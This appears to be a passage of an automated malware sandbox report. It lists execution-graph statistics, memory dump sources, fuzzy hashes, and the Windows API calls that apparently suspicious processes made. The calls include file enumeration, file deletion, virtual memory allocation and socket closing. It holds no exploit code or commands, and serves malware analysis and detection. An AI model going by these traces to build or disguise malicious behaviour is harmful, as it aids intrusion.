                                                                                                                                                          • Opcode ID: 8e20f172652a86dcc3d281bbfe66b6ef007eb6df33894e060dcc7d8baf977f86
                                                                                                                                                          • Instruction ID: 956e47c0b60d0a84284156c1e3648d7f1cf98616b50881c9422e82781e1c27a3
                                                                                                                                                          • Opcode Fuzzy Hash: 8e20f172652a86dcc3d281bbfe66b6ef007eb6df33894e060dcc7d8baf977f86
                                                                                                                                                          • Instruction Fuzzy Hash: 9B41BC71900329DFDB259FA9D940AAEBBB8FF95B50F04406AEA94DB294D7308841CB60

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:2.5%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:3
                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                          execution_graph 12352 6c3e620 12353 6c3e63d 12352->12353 12354 6c3e64c closesocket 12353->12354

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 6c3e620-6c3e65a call 6c16760 call 6c3f1f0 closesocket
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: closesocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2781271927-0
                                                                                                                                                          • Opcode ID: 9273b273d68921ec2e4ed655abae52dd9e467ff9c2a7a03049c789026ff8e20a
                                                                                                                                                          • Instruction ID: 844da6648df191117deea6de83c25b5747ce478de907163cafc54a3620f351a8
                                                                                                                                                          • Opcode Fuzzy Hash: 9273b273d68921ec2e4ed655abae52dd9e467ff9c2a7a03049c789026ff8e20a
                                                                                                                                                          • Instruction Fuzzy Hash: 90E08C7A2402587BD2A0FA5ADC40DEBB3ACDFC6710B00442AFE18A7240CAB0B90187F0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $#b$*^$1$2D$?T$@$@u$AY$H$H~$N$U2#b$dC$f$ox$s$w9
                                                                                                                                                          • API String ID: 0-2158957546
                                                                                                                                                          • Opcode ID: 7ae9e3a38e60a6df40b485f7d19046d7be571d3d3e1ff6c6370e8e3837faebf5
                                                                                                                                                          • Instruction ID: f3928c4627df0e13df9835811d19572995b523d255f9b990b885c0b65191a5a0
                                                                                                                                                          • Opcode Fuzzy Hash: 7ae9e3a38e60a6df40b485f7d19046d7be571d3d3e1ff6c6370e8e3837faebf5
                                                                                                                                                          • Instruction Fuzzy Hash: BAE1EDB0D05269CBEB64CF85C998BADBBB2BB45308F1081DDC11D7B281C7B95A89DF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1a73273a0a5193faa63b0982bfbae7d8ba74a5c79729ba2dfd1896fb596de7d1
                                                                                                                                                          • Instruction ID: f12f1f084c159121ac51be78de4d0ebfc3eb8af03e2834aebcaf4b34a8cad757
                                                                                                                                                          • Opcode Fuzzy Hash: 1a73273a0a5193faa63b0982bfbae7d8ba74a5c79729ba2dfd1896fb596de7d1
                                                                                                                                                          • Instruction Fuzzy Hash: CFC01222A000158E85142EA8B0420B8F3B0E687232F0079F6EE196A401422284249ACE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6bd0000_lSomfUdjbC.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 21cf719c463026e3209ef41efbc25897af294f43bea7ed2b5e46da329f44e439
                                                                                                                                                          • Instruction ID: 0f2a9792e17cece4042f31dfd1a98d0234a938b193eab56c82b14204e5d552b3
                                                                                                                                                          • Opcode Fuzzy Hash: 21cf719c463026e3209ef41efbc25897af294f43bea7ed2b5e46da329f44e439
                                                                                                                                                          • Instruction Fuzzy Hash: 5FA00117F860184248246C8AB8611B5E368D287176D90B2A7DE0CB35005406C42501DE

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:3%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:4%
                                                                                                                                                          Signature Coverage:1.5%
                                                                                                                                                          Total number of Nodes:479
                                                                                                                                                          Total number of Limit Nodes:77
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0293C0AF
                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0293C0EE
                                                                                                                                                          • FindClose.KERNELBASE(?), ref: 0293C0F9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                          • Opcode ID: a5e54aa4d2f82ac75b3b5f61746cbb78e13766490a4d6b0bb337a396b9723b99
                                                                                                                                                          • Instruction ID: ad64577ae9b8f476e4b7ec46759ab854488caece3c3570a5e2a9169d8c766a44
                                                                                                                                                          • Opcode Fuzzy Hash: a5e54aa4d2f82ac75b3b5f61746cbb78e13766490a4d6b0bb337a396b9723b99
                                                                                                                                                          • Instruction Fuzzy Hash: 71316E71900748BBDB21EF64CC85FEB77BDEF84749F144459F908A7180DA70AA848BA0
                                                                                                                                                          APIs
                                                                                                                                                          • NtCreateFile.NTDLL(?,06B611D6,?,?,?,?,?,?,?,?,?), ref: 02948AB8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: fd5a625bb81c2337e524eb3fe1b921e1f8728350ddcfbde0e4743b05e1da8857
                                                                                                                                                          • Instruction ID: 91b85357e2443b87b7a4366209b47f7d38b635b24595905bb8f76c6fc582d68b
                                                                                                                                                          • Opcode Fuzzy Hash: fd5a625bb81c2337e524eb3fe1b921e1f8728350ddcfbde0e4743b05e1da8857
                                                                                                                                                          • Instruction Fuzzy Hash: 3431A1B5A01248ABDB14DF99D881EEFB7B9AF8C310F108209F919A7244D774A951CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • NtReadFile.NTDLL(?,06B611D6,?,?,?,?,?,?,?), ref: 02948C03
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                          • Opcode ID: 3d104744ebe8acaf9ec54abf90b14a3cc78ff5fc03015d6e3da3df82d4ade34f
                                                                                                                                                          • Instruction ID: d8f42fe8812e73913bd7f400aa957c6fa5a1824341610a45b692f6d098fc9130
                                                                                                                                                          • Opcode Fuzzy Hash: 3d104744ebe8acaf9ec54abf90b14a3cc78ff5fc03015d6e3da3df82d4ade34f
                                                                                                                                                          • Instruction Fuzzy Hash: 1631D2B5A00248AFDB04DF99D881EEFB7B9AF88314F008209F918A7244D774A811CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(029317FB,06B611D6,0294798F,00000000,00000004,00003000,?,?,?,?,?,0294798F,029317FB), ref: 02948EC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                          • Opcode ID: 5c9e9ee626a7e7b8b0c6e6f768739af3bc718c6d600b74d334166e7a47a84f3b
                                                                                                                                                          • Instruction ID: cd6280420304cb56f0ba5dc9b83c34d216479e8d3a17a2994c7debe5fd776f47
                                                                                                                                                          • Opcode Fuzzy Hash: 5c9e9ee626a7e7b8b0c6e6f768739af3bc718c6d600b74d334166e7a47a84f3b
                                                                                                                                                          • Instruction Fuzzy Hash: 1E212BB5A00249ABDB10DF98DC41EEFB7BAEF88300F008509FD1897240D774A951CFA5
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DeleteFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4033686569-0
                                                                                                                                                          • Opcode ID: 8fa01f27c7d2a94d8e64adcdf6cbce2e7d4e070d4c0a26991eac1d178eb85420
                                                                                                                                                          • Instruction ID: 7c6923bf340754148d38de65131297ba0a0505c95c670bee27bf69affc08e428
                                                                                                                                                          • Opcode Fuzzy Hash: 8fa01f27c7d2a94d8e64adcdf6cbce2e7d4e070d4c0a26991eac1d178eb85420
                                                                                                                                                          • Instruction Fuzzy Hash: A7115E719012196AE620EAA9DC41FEFB7ADEFC9714F008109F918AB280DBB47515CBE5
                                                                                                                                                          APIs
                                                                                                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02948CE4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 53bde6128cc4e5cc5f3baabdef2dbf61e76e2ae286635c09d654a3f9d13c061d
                                                                                                                                                          • Instruction ID: b3018d12821cac8d707473c9da283f5c6fc285ba2ebcedd65d51d07a16bc1b3c
                                                                                                                                                          • Opcode Fuzzy Hash: 53bde6128cc4e5cc5f3baabdef2dbf61e76e2ae286635c09d654a3f9d13c061d
                                                                                                                                                          • Instruction Fuzzy Hash: 169002616015004661417158480440664059BE1305395C616B555D561C8618D9A9966A
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: f492675c9941414358f54597cb3d7d22b7ee2d3872f319cc5fe5aff12dc72417
                                                                                                                                                          • Instruction ID: ae73b8c64d82d53d246928e2fcc6ae215d26f51de6f11aef6630c1858d5ceada
                                                                                                                                                          • Opcode Fuzzy Hash: f492675c9941414358f54597cb3d7d22b7ee2d3872f319cc5fe5aff12dc72417
                                                                                                                                                          • Instruction Fuzzy Hash: 9390023160580016B1417158488454644059BE0305B55C512F542D555C8A14DAAA5762
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: c10997c0876e77f6475f1e327a69c8469193ac93c93a78d8157a21ba630bad75
                                                                                                                                                          • Instruction ID: 1574cb998370b9fe807c50d82fc5f4572ccc6d6ed29bb27df851ca411315bbff
                                                                                                                                                          • Opcode Fuzzy Hash: c10997c0876e77f6475f1e327a69c8469193ac93c93a78d8157a21ba630bad75
                                                                                                                                                          • Instruction Fuzzy Hash: 2690023120140406F1017598540864604058BE0305F55D512BA02D556EC665D9E56532
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 617eb1c3c87c6da446c77f8f24dc51094086d434314c61ec2777e1060040f8c8
                                                                                                                                                          • Instruction ID: a377016946278dad897768e17c4160d2a67732c6e298a3c95d7e8fc414546de0
                                                                                                                                                          • Opcode Fuzzy Hash: 617eb1c3c87c6da446c77f8f24dc51094086d434314c61ec2777e1060040f8c8
                                                                                                                                                          • Instruction Fuzzy Hash: B990023120140846F10171584404B4604058BE0305F55C517B512D655D8615D9A57922
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 04995b9eba18fd00aa137b891e4723df5b7dbe519b61e940321dd6793ffb70d6
                                                                                                                                                          • Instruction ID: 558a2ea6b6db1dc0a38c5617afecd841c15a929f47bf2b261347af545adcc2f0
                                                                                                                                                          • Opcode Fuzzy Hash: 04995b9eba18fd00aa137b891e4723df5b7dbe519b61e940321dd6793ffb70d6
                                                                                                                                                          • Instruction Fuzzy Hash: 9F90023120148806F1117158840474A04058BD0305F59C912B942D659D8695D9E57522
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 7b836b50f87e41cb321b97bfc0bc181e2d716a57bb5afcb190ce2a07a8913048
                                                                                                                                                          • Instruction ID: c876e9ed91e62e6bc12c17e3b159e33fd5302267c20b9b1a85694abf3ef1e309
                                                                                                                                                          • Opcode Fuzzy Hash: 7b836b50f87e41cb321b97bfc0bc181e2d716a57bb5afcb190ce2a07a8913048
                                                                                                                                                          • Instruction Fuzzy Hash: 97900221242441567546B158440450744069BE0245795C513B641D951C8526E9AADA22
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: bdcd3429ef5fbd351718c438ca1e34c4266bdc87093159cd80318ffb08df0230
                                                                                                                                                          • Instruction ID: ae071c0a10cc1b75bee9d6797ab61eeee55d0f18c337e689752bb28c531a3737
                                                                                                                                                          • Opcode Fuzzy Hash: bdcd3429ef5fbd351718c438ca1e34c4266bdc87093159cd80318ffb08df0230
                                                                                                                                                          • Instruction Fuzzy Hash: 8390023120140417F1127158450470704098BD0245F95C913B542D559D9656DAA6A522
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 00e4cf7046728179caa159af9721b166d0564de897ff55dc64ab77fb2c223df9
                                                                                                                                                          • Instruction ID: 6f116dd087a771757eccb95e55f7723bf54974ae50b917ed0816bc030414c694
                                                                                                                                                          • Opcode Fuzzy Hash: 00e4cf7046728179caa159af9721b166d0564de897ff55dc64ab77fb2c223df9
                                                                                                                                                          • Instruction Fuzzy Hash: 8190022921340006F1817158540860A04058BD1206F95D916B501E559CC915D9BD5722
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: ce51ed4f9d48354d60e99ac2cd4eb9abc066e9591ab574c0179e9795351ad104
                                                                                                                                                          • Instruction ID: 42f630b65b23355f8c1bfb494d8ce03fd75f9f999e9290a4f9474185d515831d
                                                                                                                                                          • Opcode Fuzzy Hash: ce51ed4f9d48354d60e99ac2cd4eb9abc066e9591ab574c0179e9795351ad104
                                                                                                                                                          • Instruction Fuzzy Hash: 8690022130140007F141715854186064405DBE1305F55D512F541D555CD915D9AA5623
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 85efdc0336b4ac82b914d42d26cbf7960e5253acd2ebf9640a3bc3c14b4d6029
                                                                                                                                                          • Instruction ID: b0a7c547e940e2f49acc58e27abbe3ce6e81d6752284524a4e515687ccc38a80
                                                                                                                                                          • Opcode Fuzzy Hash: 85efdc0336b4ac82b914d42d26cbf7960e5253acd2ebf9640a3bc3c14b4d6029
                                                                                                                                                          • Instruction Fuzzy Hash: 4490022160140506F10271584404616040A8BD0245F95C523B602D556ECA25DAE6A532
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 188f9f2b547e970330b6d15b239f6e69c5fcdea72b4765df5ce3afcabe6be55e
                                                                                                                                                          • Instruction ID: 2bc97d51f53b71ff38e6a81de2c20dacd29f5ec7dcda03a132cfc7c05d1f0d22
                                                                                                                                                          • Opcode Fuzzy Hash: 188f9f2b547e970330b6d15b239f6e69c5fcdea72b4765df5ce3afcabe6be55e
                                                                                                                                                          • Instruction Fuzzy Hash: 1990026120180407F1417558480460704058BD0306F55C512B706D556E8A29DDA56536
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 6fc370a1a19a6b47093d7ef71793369ad7b36181ba0b70865133f04a2d365986
                                                                                                                                                          • Instruction ID: 6af578745f3d45bd7e39896d95b7838e179cd2d2a3e85350995a94b63cfcbcd9
                                                                                                                                                          • Opcode Fuzzy Hash: 6fc370a1a19a6b47093d7ef71793369ad7b36181ba0b70865133f04a2d365986
